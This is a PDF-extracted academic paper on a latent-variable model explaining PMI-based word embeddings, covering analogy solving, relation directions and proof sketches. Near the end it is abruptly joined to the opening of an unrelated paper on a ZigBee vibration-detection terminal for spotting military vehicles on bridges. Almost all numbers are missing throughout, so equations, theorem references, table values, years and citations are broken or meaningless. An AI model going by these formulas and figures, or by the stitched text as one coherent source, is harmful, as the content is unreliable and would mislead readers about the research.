)−〈vw,vw′〉−sw−sw′−c) with f(xw,w′ ) = min{x / w,w′, }. their weight- ing methods and the need for bias terms sw,sw′,c were derived by trial and error; here they are all predicted and given meanings due to theorem . , specifically sw = ‖vw‖ . connection to word vec(cbow). the cbow model in word vec posits that the probability of a word wk+ as a function of the previous k words w ,w , . . . ,wk: p ( wk+ ∣∣{wi}ki= ) ∝ exp(〈vwk+ , k k∑ i= vwi〉). this expression seems mysterious since it de- pends upon the average word vector for the previ- ous k words. we show it can be theoretically jus- tified. assume a simplified version of our model, where a small window of k words is generated as follows: sample c ∼ c, where c is a uniformly ran- dom unit vector, then sample (w ,w , . . . ,wk) ∼ exp(〈 ∑k i= vwi,c〉)/zc. furthermore, assume zc = z for any c. lemma . . in the simplified version of our model, the maximum-a-posteriori (map) estimate of c given (w ,w , . . . ,wk) is ∑k i= vwi ‖ ∑k i= vwi‖ . proof. the c maximizing p (c|w ,w , . . . ,wk) is the maximizer of p(c)p (w ,w , . . . ,wk|c). since p(c) = p(c′) for any c,c′, and we have p (w ,w , . . . ,wk|c) = exp(〈 ∑ i vwi,c〉)/z, the maximizer is clearly c = ∑k i= vwi ‖ ∑k i= vwi‖ . thus using the map estimate of ct gives essen- tially the same expression as cbow apart from the rescaling, which is often omitted due to computa- tional efficiency in empirical works. explaining relations=lines as mentioned, word analogies like “a:b::c:??” can be solved via a linear algebraic expression: argmin d ‖va −vb −vc + vd‖ , ( . ) where vectors have been normalized such that ‖vd‖ = . 
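for unit-norm vectors the query in the last display reduces to maximizing an inner product; a short sketch is below (excluding the three query words from the candidates is common practice, though not part of the expression itself).

```python
import numpy as np

def solve_analogy(V, a, b, c):
    """Solve 'a : b :: c : ?' by argmin_d || v_a - v_b - v_c + v_d ||
    over unit-normalized vectors, which for fixed-norm v_d is the same
    as argmax_d <v_d, v_b - v_a + v_c>. a, b, c are row indices into V."""
    Vn = V / np.linalg.norm(V, axis=1, keepdims=True)
    target = Vn[b] - Vn[a] + Vn[c]
    scores = Vn @ target
    scores[[a, b, c]] = -np.inf     # do not return one of the query words
    return int(np.argmax(scores))
```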
this suggests that the semantic rela- tionships being tested in the analogy are character- ized by a straight line, referred to earlier as rela- tions=lines. using our model we will show the following for low-dimensional embeddings: for each such relation r there is a direction µr in space such that for any word pair a,b satisfying the relation, va −vb is like µr plus some noise vector. this happens for rela- tions satisfying a certain condition described below. empirical results supporting this theory appear in section , where this linear structure is further lever- aged to slightly improve analogy solving. a side product of our argument will be a mathematical explanation of the empirically well- established superiority of low-dimensional word embeddings over high-dimensional ones in this set- ting (levy and goldberg, a). as mentioned ear- lier, the usual explanation that smaller models gen- eralize better is fallacious. we first sketch what was missing in prior attempts to prove versions of relations=lines from first principles. the basic issue is approximation er- ror: the difference between the best solution and the nd best solution to ( . ) is typically small, whereas the approximation error in the objective in the low- dimensional solutions is larger. for instance, if one uses our pmi objective, then the weighted average of the termwise error in ( . ) is %, and the expres- sion in ( . ) above contains six inner products. thus in principle the approximation error could lead to a failure of the method and the emergence of linear relationship, but it does not. prior explanations. pennington et al. ( ) try to propose a model where such linear relationships should occur by design. they posit that queen is a solution to the analogy “man:woman::king:??” be- note that this interpretation has been disputed; e.g., it is argued in levy and goldberg ( a) that ( . ) can be under- stood using only the classical connection between inner product and word similarity, using which the objective ( . ) is slightly improved to a different objective called cosmul. however, this “explanation” is still dogged by the issue of large termwise error pinpointed here, since inner product is only a rough ap- proximation to word similarity. furthermore, the experiments in section clearly support the relations=lines interpreta- tion. cause p(χ | king) p(χ | queen) ≈ p(χ | man) p(χ | woman), ( . ) where p(χ | king) denotes the conditional proba- bility of seeing word χ in a small window of text around king. relationship ( . ) is intuitive since both sides will be ≈ for gender-neutral χ like “walks” or “food”, will be > when χ is like “he, henry” and will be < when χ is like “dress, she, elizabeth.” this was also observed by levy and goldberg ( a). given ( . ), they then posit that the correct model describing word embeddings in terms of word occurrences must be a homomorphism from (<d, +) to (<+,×), so vector differences map to ratios of probabilities. this leads to the expres- sion pw,w′ = 〈vw,vw′〉 + bw + bw′, and their method is a (weighted) least squares fit for this expression. one shortcoming of this argument is that the homomorphism assumption assumes the linear relationships instead of explaining them from a more basic principle. more importantly, the empir- ical fit to the homomorphism has nontrivial approx- imation error, high enough that it does not imply the desired strong linear relationships. levy and goldberg ( b) show that empiri- cally, skip-gram vectors satisfy 〈vw,vw′〉≈ pmi(w,w′) ( . 
) up to some shift. they also give an argument sug- gesting this relationship must be present if the so- lution is allowed to be very high-dimensional. un- fortunately, that argument does not extend to low- dimensional embeddings. even if it did, the issue of termwise approximation error remains. our explanation. the current paper has intro- duced a generative model to theoretically explain the emergence of relationship ( . ). however, as noted after theorem . , the issue of high approximation error does not go away either in theory or in the em- pirical fit. we now show that the isotropy of word vectors (assumed in the theoretical model and ver- ified empirically) implies that even a weak version of ( . ) is enough to imply the emergence of the ob- served linear relationships in low-dimensional em- beddings. this argument will assume the analogy in ques- tion involves a relation that obeys pennington et al.’s suggestion in ( . ). namely, for such a relation r there exists function νr(·) depending only upon r such that for any a,b satisfying r there is a noise function ξa,b,r(·) for which: p(χ | a) p(χ | b) = νr(χ) · ξa,b,r(χ) ( . ) for different words χ there is huge variation in ( . ), so the multiplicative noise may be large. our goal is to show that the low-dimensional word embeddings have the property that there is a vector µr such that for every pair of words a,b in that relation, va − vb = µr + noise vector, where the noise vector is small. taking logarithms of ( . ) results in: log ( p(χ | a) p(χ | b) ) = log(νr(χ)) + ζa,b,r(χ) ( . ) theorem . implies that the left-hand side sim- plifies to log ( p(χ|a) p(χ|b) ) = d 〈vχ,va −vb〉 + �a,b(χ) where � captures the small approximation errors in- duced by the inexactness of theorem . . this adds yet more noise! denoting by v the n × d matrix whose rows are the vχ vectors, we rewrite ( . ) as: v (va −vb) = d log(νr) + ζ′a,b,r ( . ) where log(νr) in the element-wise log of vector νr and ζ′a,b,r = d(ζa,b,r − �a,b,r) is the noise. in essence, ( . ) shows that va−vb is a solution to a linear regression in d variables and m constraints, with ζ′a,b,r being the “noise.” the design matrix in the regression is v , the matrix of all word vectors, which in our model (as well as empirically) satisfies an isotropy condition. this makes it random-like, and thus solving the regression by left-multiplying by v †, the pseudo-inverse of v , ought to “denoise” effectively. we now show that it does. our model assumed the set of all word vectors satisfies bulk properties similar to a set of gaus- sian vectors. the next theorem will only need the following weaker properties. ( ) the smallest non- zero singular value of v is larger than some constant c times the quadratic mean of the singular values, namely, ‖v‖f/ √ d. empirically we find c ≈ / holds; see section . ( ) the left singular vectors behave like random vectors with respect to ζ′a,b,r, namely, have inner product at most c ‖ζ′a,b,r‖/ √ n with ζ′a,b,r, for some constant c . ( ) the max norm of a row in v is o( √ d). the proof is included in the appendix. theorem . (noise reduction). under the condi- tions of the previous paragraph, the noise in the dimension-reduced semantic vector space satisfies ‖ζ̄a,b,r‖ . ‖ζ′a,b,r‖ √ d n . as a corollary, the relative error in the dimension- reduced space is a factor of √ d/n smaller. experimental verification in this section, we provide experiments empirically supporting our generative model. corpus. 
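the sn objective mentioned in the training method above can be written out directly; the sketch below only evaluates it (the truncation constant is a placeholder, and in practice the minimization is carried out with adagrad rather than by hand).

```python
import numpy as np

def sn_objective(V, C, counts, x_max=100.0):
    """Squared-norm (SN) objective: a weighted least-squares fit of
    log co-occurrence counts by ||v_w + v_w'||^2 + C, with weights
    truncated to min(X_ww', x_max).  V: (n, d) word vectors, C: scalar
    offset, counts: dict mapping (w, w') index pairs to counts."""
    loss = 0.0
    for (w, wp), x in counts.items():
        if x <= 0:
            continue
        s = V[w] + V[wp]
        loss += min(x, x_max) * (np.log(x) - s @ s - C) ** 2
    return loss
```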
all word embedding vectors are trained on the english wikipedia (march dump). it is pre-processed by a standard approach (removing non-textual elements, sentence splitting, and tokenization), leaving about billion tokens. words that appeared less than times in the corpus are ignored, resulting in a vocabulary of , . the co-occurrence is then computed using windows of tokens to each side of the focus word. training method. our embedding vectors are trained by optimizing the sn objective using adagrad (duchi et al., ) with an initial learning rate of . and iterations. the pmi objective derived from ( . ) was also used. sn has an average (weighted) term-wise error of %, and pmi has %. we observed that sn vectors typically fit the model better and have better performance, which can be explained by the larger errors in pmi, as implied by theorem . . so, we only report the results for sn. for comparison, glove and two variants of word2vec (skip-gram and cbow) vectors are trained. glove's vectors are trained on the same co-occurrence as sn with the default parameter values. word2vec vectors are trained using a window size of , with other parameters set to default values. http://nlp.stanford.edu/projects/glove/ https://code.google.com/p/word2vec/ figure : the partition function zc. histograms of zc for random vectors c of appropriate norm, as defined in the text, shown for (a) sn, (b) glove, (c) cbow, and (d) skip-gram; the x-axis is the partition function value normalized by its mean, the y-axis the percentage of samples. the values zc for different c concentrate around the mean, mostly in [ . , . ]. this concentration phenomenon is predicted by our analysis. figure : the linear relationship between the squared norms of our word vectors (y-axis) and the natural logarithms of the word frequencies (x-axis). each dot in the plot corresponds to a word. the pearson correlation coefficient between the two is . , indicating a significant linear relationship, which strongly supports our mathematical prediction, that is, equation ( . ) of theorem . . . model verification experiments were run to test our modeling assumptions. first, we tested two counter-intuitive properties: the concentration of the partition function zc for different discourse vectors c (see theorem . ), and the random-like behavior of the matrix of word embeddings in terms of its singular values (see theorem . ). for comparison we also tested these properties for word2vec and glove vectors, though they are trained by different objectives. finally, we tested the linear relation between the squared norms of our word vectors and the logarithm of the word frequencies, as implied by theorem . . partition function. our theory predicts the counter-intuitive concentration of the partition function zc = ∑w′ exp(〈vw′,c〉) for a random discourse vector c (see lemma . ). this is verified empirically by picking a uniformly random direction of norm ‖c‖ = /µw, where µw is the average norm of the word vectors. figure (a) shows the histogram of zc for such randomly chosen c's for our vectors. the values are concentrated, mostly in the range [ . , . ] times the mean. concentration is also observed for other types of vectors, especially for glove and cbow. isotropy with respect to singular values.
our theoretical explanation of relations=lines as- sumes that the matrix of word vectors behaves like a random matrix with respect to the properties of singular values. in our embeddings, the quadratic mean of the singular values is . , while the min- imum non-zero singular value of our word vectors is . therefore, the ratio between them is a small constant, consistent with our model. the ratios for glove, cbow, and skip-gram are . , . , and . , respectively, which are also small constants. squared norms v.s. word frequencies. figure shows a scatter plot for the squared norms of our vectors and the logarithms of the word frequencies. a linear relationship is observed (pearson correla- tion . ), thus supporting theorem . . the cor- relation is stronger for high frequency words, pos- sibly because the corresponding terms have higher weights in the training objective. this correlation is much weaker for other types note that our model uses the inner products between the discourse vectors and word vectors, so it is invariant if the dis- course vectors are scaled by s while the word vectors are scaled by /s for any s > . therefore, one needs to choose the norm of c properly. we assume ‖c‖µw = √ d/κ ≈ for a constant κ = so that it gives a reasonable fit to the predicted dynamic range of word frequencies according to our theory; see model details in section . relations sn glove cbow skip-gram g semantic . . . . syntactic . . . . total . . . . m adjective . . . . noun . . . . verb . . . . total . . . . table : the accuracy on two word analogy task testbeds: g (the google testbed); m (the msr testbed). per- formance is close to the state of the art despite using a generative model with provable properties. of word embeddings. this is possibly because they have more free parameters (“knobs to turn”), which imbue the embeddings with other properties. this can also cause the difference in the concentration of the partition function for the two methods. . performance on analogy tasks we compare the performance of our word vec- tors on analogy tasks, specifically the two testbeds google and msr (mikolov et al., a; mikolov et al., c). the for- mer contains semantic questions such as “man:woman::king:??”, and syntactic ones such as “run:runs::walk:??.” the latter has syntactic questions for adjectives, nouns, and verbs. to solve these tasks, we use linear algebraic queries. that is, first normalize the vectors to unit norm and then solve “a:b::c:??” by argmin d ‖va −vb −vc + vd‖ . ( . ) the algorithm succeeds if the best d happens to be correct. the performance of different methods is pre- sented in table . our vectors achieve performance comparable to the state of art on semantic analogies (similar accuracy as glove, better than word vec). on syntactic tasks, they achieve accuracy . lower than glove and skip-gram, while cbow typically outperforms the others. the reason is probably one can instead use the cosmul in (levy and goldberg, a), which increases the accuracy by about %. but it is not linear while our focus here is the linear algebraic structure. it was earlier reported that skip-gram outperforms cbow (mikolov et al., a; pennington et al., ). this may be due to the different training data sets and hyperparame- ters used. relation cap-com cap-wor adj-adv opp st . ± . . ± . . ± . . ± . nd . ± . . ± . . ± . . ± . table : the verification of relation directions on se- mantic and syntactic relations in the google testbed. 
relations include cap-com: capital-common-countries; cap-wor: capital-world; adj-adv: gram -adjective-to- adverb; opp: gram -opposite. for each relation, take vab = va − vb for pairs (a,b) in the relation, and then calculate the top singular vectors of the matrix formed by these vab’s. the row with label “ st”/“ nd” shows the co- sine similarities of individual vab to the st/ nd singular vector (the mean and standard deviation). that our model ignores local word order, whereas the other models capture it to some extent. for ex- ample, a word “she” can affect the context by a lot and determine if the next word is “thinks” rather than “think”. incorporating such linguistic features in the model is left for future work. . verifying relations=lines the theory in section predicts the existence of a direction for a relation, whereas earlier levy and goldberg ( a) had questioned if this phe- nomenon is real. the experiment uses the analogy testbed, where each relation is tested using or more analogies. for each relation, we take the set of vectors vab = va −vb where the word pair (a,b) satisfies the relation. then calculate the top singu- lar vectors of the matrix formed by these vab’s, and compute the cosine similarity (i.e., normalized in- ner product) of individual vab to the singular vec- tors. we observed that most (va − vb)’s are corre- lated with the first singular vector, but have inner products around with the second singular vector. over all relations, the average projection on the first singular vector is . (semantic: . ; syntactic: . ), and the average on the second singular vector is . . for example, table shows the mean sim- ilarities and standard deviations on the first and sec- ond singular vectors for relations. similar results are also obtained for word embedings by glove and word vec. therefore, the first singular vector can be taken as the direction associated with this relation, while the other components are like random noise, in line with our model. sn glove cbow skip-gram w/o rd . . . . rd(k = ) . . . . rd(k = ) . . . . rd(k = ) . . . . table : the accuracy of the rd algorithm (i.e., the cheater method) on the google testbed. the rd al- gorithm is described in the text. for comparison, the row “w/o rd” shows the accuracy of the old method without using rd. cheating solver for analogy testbeds. the above linear structure suggests a better (but cheating) way to solve the analogy task. this uses the fact that the same semantic relationship (e.g., masculine- feminine, singular-plural) is tested many times in the testbed. if a relation r is represented by a direction µr then the cheating algorithm can learn this direc- tion (via rank svd) after seeing a few examples of the relationship. then use the following method of solving “a:b::c:??”: look for a word d such that vc−vd has the largest projection on µr, the relation direction for (a,b). this can boost success rates by about %. the testbed can try to combat such cheating by giving analogy questions in a random order. but the cheating algorithm can just cluster the presented analogies to learn which of them are in the same relation. thus the final algorithm, named analogy solver with relation direction (rd), is: take all vec- tors va − vb for all the word pairs (a,b) presented among the analogy questions and do k-means clus- tering on them; for each (a,b), estimate the rela- tion direction by taking the first singular vector of its cluster, and substitute that for va −vb in ( . ) when solving the analogy. 
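as a concrete illustration of the rd procedure, the following is a minimal python sketch (numpy and scikit-learn assumed). the dictionary emb mapping words to unit-norm vectors, the list of query triples, and the function names are illustrative choices for exposition, not the paper's released code.

```python
import numpy as np
from sklearn.cluster import KMeans

def relation_direction(diff_rows):
    """Top right singular vector of the matrix whose rows are difference
    vectors v_a - v_b: the estimated relation direction mu_r."""
    _, _, vt = np.linalg.svd(np.asarray(diff_rows), full_matrices=False)
    return vt[0] / np.linalg.norm(vt[0])

def rd_solve(emb, questions, k):
    """Solve a:b::c:? for each (a, b, c) in questions, replacing v_a - v_b
    by the relation direction learned from k-means clusters of all the
    presented difference vectors (the rd algorithm sketched in the text)."""
    diffs = np.array([emb[a] - emb[b] for a, b, c in questions])
    labels = KMeans(n_clusters=k, n_init=10).fit_predict(diffs)
    mu = {lab: relation_direction(diffs[labels == lab]) for lab in set(labels)}

    vocab = list(emb)
    mat = np.stack([emb[w] for w in vocab])          # one row per candidate word
    answers = []
    for (a, b, c), lab in zip(questions, labels):
        direction = mu[lab]
        if direction @ (emb[a] - emb[b]) < 0:        # SVD fixes the sign only up to +/-
            direction = -direction
        target = emb[c] - direction                  # v_d should lie close to v_c - mu_r
        scores = mat @ target
        for w in (a, b, c):                          # exclude the query words themselves
            scores[vocab.index(w)] = -np.inf
        answers.append(vocab[int(np.argmax(scores))])
    return answers
```

the sign flip is needed because a singular vector is defined only up to sign; orienting it against the presented pair keeps it consistent with v_a − v_b before it is substituted into the usual nearest-neighbour query.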
table shows the performance on google with different values of k; e.g. using our sn vectors and k = leads to . accuracy. thus future designers of analogy testbeds should re- member not to test the same relationship too many times! this still leaves other ways to cheat, such as learning the directions for interesting semantic rela- tions from other collections of analogies. non-cheating solver for analogy testbeds. now we show that even if a relationship is tested only once in the testbed, there is a way to use the above structure. given “a:b::c:??,” the solver first finds the top nearest neighbors of a and those of sn glove cbow skip-gram w/o rd-nn . . . . rd-nn (k = ) . . . . rd-nn (k = ) . . . . rd-nn (k = ) . . . . table : the accuracy of the rd-nn algorithm on the google testbed. the algorithm is described in the text. for comparison, the row “w/o rd-nn” shows the accu- racy of the old method without using rd-nn. b, and then finds among these neighbors the top k pairs (a′,b′) so that the cosine similarities between va′ −vb′ and va −vb are largest. finally, the solver uses these pairs to estimate the relation direction (via rank svd), and substitute this (corrected) estimate for va−vb in ( . ) when solving the analogy. this al- gorithm is named analogy solver with relation direc- tion by nearest neighbors (rd-nn). table shows its performance, which consistently improves over the old method by about %. conclusions a simple generative model has been introduced to explain the classical pmi based word embedding models, as well as recent variants involving energy- based models and matrix factorization. the model yields an optimization objective with essentially “no knobs to turn”, yet the embeddings lead to good per- formance on analogy tasks, and fit other predictions of our generative model. a model with fewer knobs to turn should be seen as a better scientific explana- tion (occam’s razor), and certainly makes the em- beddings more interpretable. the spatial isotropy of word vectors is both an assumption in our model, and also a new empir- ical finding of our paper. we feel it may help with further development of language models. it is important for explaining the success of solv- ing analogies via low dimensional vectors (rela- tions=lines). it also implies that semantic rela- tionships among words manifest themselves as spe- cial directions among word embeddings (section ), which lead to a cheater algorithm for solving anal- ogy testbeds. our model is tailored to capturing semantic sim- ilarity, more akin to a log-linear dynamic topic model. in particular, local word order is unim- portant. designing similar generative models (with provable and interpretable properties) with linguistic features is left for future work. acknowledgements we thank the editors of tacl for granting a special relaxation of the page limit for our paper. we thank yann lecun, christopher d. manning, and sham kakade for helpful discussions at various stages of this work. this work was supported in part by nsf grants ccf- , dms- , simons investiga- tor award, simons collaboration grant, and onr- n - - - . tengyu ma was supported in addition by simons award in theoretical computer science and ibm phd fellowship. references jacob andreas and dan klein. . when and why are log-linear models self-normalizing? in proceedings of the annual meeting of the north american chapter of the association for computational linguistics. sanjeev arora, yuanzhi li, yingyu liang, tengyu ma, and andrej risteski. . 
a latent variable model approach to pmi-based word embeddings. technical report, arxiv. http://arxiv.org/abs/ . . sanjeev arora, yuanzhi li, yingyu liang, tengyu ma, and andrej risteski. . linear al- gebraic structure of word senses, with applica- tions to polysemy. technical report, arxiv. http://arxiv.org/abs/ . . david belanger and sham m. kakade. . a linear dynamical system model for text. in proceedings of the nd international conference on machine learn- ing. yoshua bengio, holger schwenk, jean-sébastien senécal, fréderic morin, and jean-luc gauvain. . neural probabilistic language models. in innovations in machine learning. fischer black and myron scholes. . the pricing of options and corporate liabilities. journal of political economy. david m. blei and john d. lafferty. . dynamic topic models. in proceedings of the rd international conference on machine learning. david m. blei. . probabilistic topic models. com- munication of the association for computing machin- ery. kenneth ward church and patrick hanks. . word association norms, mutual information, and lexicogra- phy. computational linguistics. shay b. cohen, karl stratos, michael collins, dean p. foster, and lyle ungar. . spectral learning of latent-variable pcfgs. in proceedings of the th annual meeting of the association for computational linguistics: long papers-volume . ronan collobert and jason weston. a. a uni- fied architecture for natural language processing: deep neural networks with multitask learning. in proceed- ings of the th international conference on machine learning. ronan collobert and jason weston. b. a uni- fied architecture for natural language processing: deep neural networks with multitask learning. in proceed- ings of the th international conference on machine learning. scott c. deerwester, susan t dumais, thomas k. lan- dauer, george w. furnas, and richard a. harshman. . indexing by latent semantic analysis. journal of the american society for information science. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. the journal of machine learning research. john rupert firth. . a synopsis of linguistic theory. amir globerson, gal chechik, fernando pereira, and naftali tishby. . euclidean embedding of co- occurrence data. journal of machine learning re- search. tatsunori b. hashimoto, david alvarez-melis, and tommi s. jaakkola. . word embeddings as met- ric recovery in semantic spaces. transactions of the association for computational linguistics. thomas hofmann. . probabilistic latent semantic analysis. in proceedings of the fifteenth conference on uncertainty in artificial intelligence. daniel hsu, sham m. kakade, and tong zhang. . a spectral algorithm for learning hidden markov models. journal of computer and system sciences. omer levy and yoav goldberg. a. linguistic regu- larities in sparse and explicit word representations. in proceedings of the eighteenth conference on compu- tational natural language learning. omer levy and yoav goldberg. b. neural word em- bedding as implicit matrix factorization. in advances in neural information processing systems. andrew l. maas, raymond e. daly, peter t. pham, dan huang, andrew y. ng, and christopher potts. . learning word vectors for sentiment analysis. in the th annual meeting of the association for computa- tional linguistics. yariv maron, michael lamar, and elie bienenstock. . sphere embedding: an application to part-of- speech induction. 
in advances in neural information processing systems. tomas mikolov, kai chen, greg corrado, and jeffrey dean. a. efficient estimation of word representa- tions in vector space. proceedings of the international conference on learning representations. tomas mikolov, ilya sutskever, kai chen, greg s. cor- rado, and jeff dean. b. distributed represen- tations of words and phrases and their composition- ality. in advances in neural information processing systems. tomas mikolov, wen-tau yih, and geoffrey zweig. c. linguistic regularities in continuous space word representations. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies. andriy mnih and geoffrey hinton. . three new graphical models for statistical language modelling. in proceedings of the th international conference on machine learning. christos h. papadimitriou, hisao tamaki, prabhakar raghavan, and santosh vempala. . latent se- mantic indexing: a probabilistic analysis. in proceed- ings of the th acm sigact-sigmod-sigart sym- posium on principles of database systems. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word rep- resentation. proceedings of the empiricial methods in natural language processing. douglas l. t. rohde, laura m. gonnerman, and david c. plaut. . an improved model of seman- tic similarity based on lexical co-occurence. commu- nication of the association for computing machinery. david e. rumelhart, geoffrey e. hinton, and james l. mcclelland, editors. . parallel distributed pro- cessing: explorations in the microstructure of cogni- tion. david e. rumelhart, geoffrey e. hinton, and ronald j. williams. . learning representations by back- propagating errors. cognitive modeling. peter d. turney and patrick pantel. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research. a proof sketches here we provide the proof sketches, while the com- plete proof can be found in the full version (arora et al., ). proof sketch of theorem . let w and w′ be two arbitrary words. let c and c′ denote two consecutive context vectors, where c ∼ c and c′|c is defined by the markov kernel p(c′ | c). we start by using the law of total expectation, in- tegrating out the hidden variables c and c′: p(w,w′) = e c,c′ [ pr[w,w′|c,c′] ] = e c,c′ [p(w|c)p(w′|c′)] = e c,c′ [ exp(〈vw,c〉) zc exp(〈vw′,c′〉) zc′ ] (a. ) an expectation like (a. ) would normally be dif- ficult to analyze because of the partition functions. however, we can assume the inequality ( . ), that is, the partition function typically does not vary much for most of context vectors c. let f be the event that both c and c′ are within ( ± �z)z. then by ( . ) and the union bound, event f happens with proba- bility at least − exp(−Ω(log n)). we will split the right-hand side (rhs) of (a. ) into the parts ac- cording to whether f happens or not. rhs of (a. ) = e c,c′ [ exp(〈vw,c〉) zc exp(〈vw′,c′〉) zc′ f ] ︸ ︷︷ ︸ t + e c,c′ [ exp(〈vw,c〉) zc exp(〈vw′,c′〉) zc′ f̄ ] ︸ ︷︷ ︸ t (a. ) where f̄ denotes the complement of event f and f and f̄ denote indicator functions for f and f̄ , respectively. when f happens, we can replace zc by z with a ± �z factor loss: the first term of the rhs of (a. ) equals to t = ±o(�z) z e c,c′ [ exp(〈vw,c〉) exp(〈vw′,c′〉) f ] (a. ) on the other hand, we can use e[ f̄ ] = pr[f̄] ≤ exp(−Ω(log n)) to show that the second term of rhs of (a. ) is negligible, |t | = exp(−Ω(log . n)) . (a. 
) this claim must be handled somewhat carefully since the rhs does not depend on d at all. briefly, the reason this holds is as follows: in the regime when d is small ( √ d = o(log n)), any word vec- tor vw and discourse c satisfies that exp(〈vw,c〉) ≤ exp(‖vw‖) = exp(o( √ d)), and since e[ f̄ ] = exp(−Ω(log n)), the claim follows directly; in the regime when d is large ( √ d = Ω(log n)), we can use concentration inequalities to show that except with a small probability exp(−Ω(d)) = exp(−Ω(log n)), a uniform sample from the sphere behaves equivalently to sampling all of the coor- dinates from a standard gaussian distribution with mean and variance d , in which case the claim is not too difficult to show using gaussian tail bounds. therefore it suffices to only consider (a. ). our model assumptions state that c and c′ cannot be too different. we leverage that by rewriting (a. ) a little, and get that it equals t = ±o(�z) z e c [ exp(〈vw,c〉) e c′|c [ exp(〈vw′,c′〉) ] ] = ±o(�z) z e c [exp(〈vw,c〉)a(c)] (a. ) where a(c) := e c′|c [ exp(〈vw′,c′〉) ] . we claim that a(c) = ( ± o(� )) exp(〈vw′,c〉). doing some al- gebraic manipulations, a(c) = exp(〈vw′,c〉) e c′|c [ exp(〈vw′,c′ − c〉) ] . furthermore, by our model assumptions, ‖c−c′‖≤ � / √ d. so 〈vw,c− c′〉≤ ‖vw‖‖c− c′‖ = o(� ) and thus a(c) = ( ± o(� )) exp(〈vw′,c〉). plug- ging the simplification of a(c) to (a. ), t = ±o(�z) z e[exp(〈vw + vw′,c〉)]. (a. ) since c has uniform distribution over the sphere, the random variable 〈vw + vw′,c〉 has distribution pretty similar to gaussian distribution n( ,‖vw + vw′‖ /d), especially when d is relatively large. ob- serve that e[exp(x)] has a closed form for gaussian random variable x ∼n( ,σ ), e[exp(x)] = ∫ x σ √ π exp(− x σ ) exp(x)dx = exp(σ / ) . (a. ) bounding the difference between 〈vw + vw′,c〉 from gaussian random variable, we can show that for � = õ( /d), e[exp(〈vw + vw′,c〉)] = ( ± �) exp ( ‖vw + vw′‖ d ) . (a. ) therefore, the series of simplifica- tion/approximation above (concretely, combining equations (a. ), (a. ), (a. ), (a. ), and (a. )) lead to the desired bound on log p(w,w′) for the case when the window size q = . the bound on log p(w) can be shown similarly. proof sketch of lemma . note that for fixed c, when word vectors have gaussian priors assumed as in our model, zc = ∑ w exp(〈vw,c〉) is a sum of independent random variables. we first claim that using proper concentration of measure tools, it can be shown that the vari- ance of zc are relatively small compared to its mean evw [zc], and thus zc concentrates around its mean. note this is quite non-trivial: the ran- dom variable exp(〈vw,c〉) is neither bounded nor subgaussian/sub-exponential, since the tail is ap- proximately inverse poly-logarithmic instead of in- verse exponential. in fact, the same concentration phenomenon does not happen for w. the occur- rence probability of word w is not necessarily con- centrated because the ` norm of vw can vary a lot in our model, which allows the frequency of the words to have a large dynamic range. so now it suffices to show that evw [zc] for differ- ent c are close to each other. using the fact that the word vector directions have a gaussian distribution, evw [zc] turns out to only depend on the norm of c (which is equal to ). more precisely, e vw [zc] = f(‖c‖ ) = f( ) (a. ) where f is defined as f(α) = nes[exp(s α/ )] and s has the same distribution as the norms of the word vectors. we sketch the proof of this. in our model, vw = sw · v̂w, where v̂w is a gaussian vector with identity covariance i. 
then e vw [zc] = n e vw [exp(〈vw,c〉)] = n e sw [ e vw|sw [exp(〈vw,c〉) | sw] ] where the second line is just an application of the law of total expectation, if we pick the norm of the (random) vector vw first, followed by its direction. conditioned on sw, 〈vw,c〉 is a gaussian random variable with variance ‖c‖ s w, and therefore using similar calculation as in (a. ), we have e vw|sw [exp(〈vw,c〉) | sw] = exp(s ‖c‖ / ) . hence, evw [zc] = nes[exp(s ‖c‖ / )] as needed. proof of theorem . the proof uses the standard analysis of linear regression. let v = pΣqt be the svd of v and let σ , . . . ,σd be the left singular val- ues of v (the diagonal entries of Σ). for notational ease we omit the subscripts in ζ̄ and ζ′ since they are not relevant for this proof. since v † = qΣ− pt and thus ζ̄ = v †ζ′ = qΣ− ptζ′, we have ‖ζ̄‖ ≤ σ− d ‖p tζ′‖ . (a. ) we claim σ− d ≤ √ c n . (a. ) indeed, ∑d i= σ i = o(nd), since the average squared norm of a word vector is d. the claim then follows from the first assumption. furthermore, by the second assumption, ‖ptζ′‖∞ ≤ c √n‖ζ ′‖ , so ‖ptζ′‖ ≤ c d n ‖ζ′‖ . (a. ) plugging (a. ) and (a. ) into (a. ), we get ‖ζ̄‖ ≤ √ c n √ c d n ‖ζ′‖ = c √ d √ c n ‖ζ′‖ as desired. the last statement follows because the norm of the signal, which is d log(νr) originally and is v †d log(νr) = va−vb after dimension reduction, also gets reduced by a factor of √ n. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , design of a vibration detection terminal guoshao chen school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com fei xu school of computer science and engineering xi’an technological university xi’an, china e-mail: xinfei @qq.com abstract—by detecting the vibration of bridge deck, the information of passing vehicles can be obtained indirectly, which is of great significance to grasp the dynamics of the enemy. in this paper, a micro-power wireless vibration detection terminal is designed. in order to reduce the overall power consumption of the terminal, which use two sensors, one is spring switch and another is acceleration sensor. when no vehicle passes by, the terminal is in a dormant state. when a vehicle passes by, the spring switch wakes up the cpu and the acceleration sensor to collect data. zigbee network is used for data transmission, which has the advantages of low power consumption and ad hoc network. experiments show that the average power consumption of the terminal is less than mw. if the terminal is powered by . v, ah lithium battery, in theory, it can work for at least two years. keywords-vibration detection; zigbee; micro-power consumption i. introduction in the national defense and military affairs, the detection of passing vehicles in a specific area is of great significance for understanding each other's dynamics. the monitoring of bridge vibration can be more convenient to monitor vehicle dynamics. considering the concealment, destructiveness and inconvenience of construction, this terminal uses wireless communication, battery power supply and micro-power design. common wireless communication methods include bluetooth technology, wi-fi technology, gprs, zigbee and so on. because of the low power consumption of zigbee network and autonomous network, this paper chooses zigbee network. in order to achieve low power consumption, this paper considers two aspects, one is sensor power consumption, the other is processor power consumption. 
